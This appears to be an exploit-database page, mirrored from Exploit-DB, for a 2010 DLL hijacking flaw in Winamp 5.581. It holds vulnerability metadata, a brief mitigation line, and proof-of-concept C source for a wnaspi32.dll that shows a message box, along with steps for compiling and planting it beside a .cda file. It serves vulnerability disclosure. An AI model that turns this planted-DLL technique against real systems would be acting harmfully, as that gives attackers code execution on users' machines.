header-logo
Suggest Exploit
vendor:
Winamp
by:
Gjoko 'LiquidWorm' Krstic
7,2
CVSS
HIGH
DLL Hijacking
427
CWE
Product Name: Winamp
Affected Version From: 5.581 (x86)
Affected Version To: 5.581 (x86)
Patch Exists: Yes
Related CWE: N/A
CPE: a:nullsoft:winamp:5.581
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Microsoft Windows XP Professional SP3 (EN)
2010

Nullsoft Winamp 5.581 (wnaspi32.dll) DLL Hijacking Exploit

Winamp 5.581 suffers from a dll hijacking vulnerability that enables the attacker to execute arbitrary code on a local level. The vulnerable extensions are .669, .aac, .aiff, .amf, .au, .avr, .b4s, .caf and .cda thru wnaspi32.dll and dwmapi.dll libraries.

Mitigation:

Ensure that the application is not vulnerable to DLL hijacking by using the latest version of the application.
Source

Exploit-DB raw data:

/*

 Nullsoft Winamp 5.581 (wnaspi32.dll) DLL Hijacking Exploit

 Vendor: Nullsoft.
 Product Web Page: http://www.winamp.com
 Affected Version: 5.581 (x86)

 Summary: Winamp is a media player for Windows-based PCs,
 written by Nullsoft, now a subsidiary of AOL. It is
 proprietary freeware/shareware, multi-format, extensible
 with plug-ins and skins, and is noted for its graphical
 sound visualization, playlist, and media library features.

 Desc: Winamp 5.581 suffers from a dll hijacking vulnerability
 that enables the attacker to execute arbitrary code on a local
 level. The vulnerable extensions are .669, .aac, .aiff, .amf,
 .au, .avr, .b4s, .caf and .cda thru wnaspi32.dll and dwmapi.dll
 libraries.

 ----
 gcc -shared -o wnaspi32.dll winamp.c

 Compile and rename to wnaspi32.dll, create a file test.cda and put both
 files in same dir and execute.
 ----

 Tested on Microsoft Windows XP Professional SP3 (EN)



 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Zero Science Lab - http://www.zeroscience.mk


 25.08.2010

*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}

Navigation

Suggest Exploit

Services By CQR